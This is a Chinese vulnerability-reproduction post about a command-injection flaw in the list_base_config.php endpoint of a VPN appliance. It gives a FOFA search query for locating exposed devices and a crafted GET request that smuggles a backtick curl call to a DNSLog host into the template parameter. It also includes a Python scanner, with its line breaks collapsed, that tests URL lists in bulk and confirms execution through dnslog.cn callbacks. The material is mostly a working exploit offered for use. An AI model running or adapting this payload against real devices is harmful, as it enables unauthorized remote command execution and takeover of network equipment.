【漏洞复现】某某康达vpn——list_base_config.php——命令执行
声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。
文章目录
- 漏洞描述
- 漏洞复现
- 测试工具
漏洞描述
网络设备是支撑计算机网络运行的重要硬件,包括路由器、交换机、网桥、网卡、集线器、防火墙、调制解调器和无线接入点等。路由器负责网络间的数据转发和地址转换,交换机用于局域网内设备的互联和数据交换,网桥连接不同网段实现互通,网卡提供有线或无线网络接口。防火墙则对网络流量进行监控和控制,保护网络安全。某某康达vpn,其接口list_base_config.php存在命令执行漏洞,攻击者可通过该漏洞获取系统权限。
漏洞复现
1)信息收集
fofa:body="/images/raisecom/back.gif"
凡是过去,皆为序章;凡是未来,皆有可期。
获取DNSLog
构造数据包
GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60curl%DNS.log%60 HTTP/1.1
Host:ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
回到DNSLog查看回显
成功回显,验证成功。
测试工具
poc
import requests
import urllib3
import re,string,random
from urllib.parse import urljoin
import argparse
import time
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)def read_file(file_path):with open(file_path, 'r') as file:urls = file.read().splitlines()return urlsdef check(url):url = url.rstrip("/")try:headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.13 (KHTML, like Gecko) Chrome/24.0.1284.0 Safari/537.13",}getdomain = requests.get(url='http://dnslog.cn/getdomain.php', headers={"Cookie": "PHPSESSID=5q814qoa1oi4ck076cjstma9g2"}, timeout=30)domain = str(getdomain.text)target_url = urljoin(url,"/vpn/list_base_config.php?type=mod&parts=base_config&template=%60curl%20{}%60".format(domain))requests.get(target_url, verify=False, headers=headers, timeout=40)for i in range(0, 3):refresh = requests.get(url='http://dnslog.cn/getrecords.php', headers={"Cookie": "PHPSESSID=5q814qoa1oi4ck076cjstma9g2"}, timeout=30)time.sleep(2)if domain in refresh.text:print(f"\033[31mDiscovered:{url}: raiseco_list_base_config_RCE!\033[0m")return Trueexcept Exception as e:passif __name__ == "__main__":parser = argparse.ArgumentParser()parser.add_argument("-u", "--url", help="URL")parser.add_argument("-f", "--txt", help="file")args = parser.parse_args()url = args.urltxt = args.txtif url:check(url)elif txt:urls = read_file(txt)for url in urls:check(url)else:print("help")
运行截图
你可以期待太阳从东方升起,而风却随心所欲地从四面八方吹来。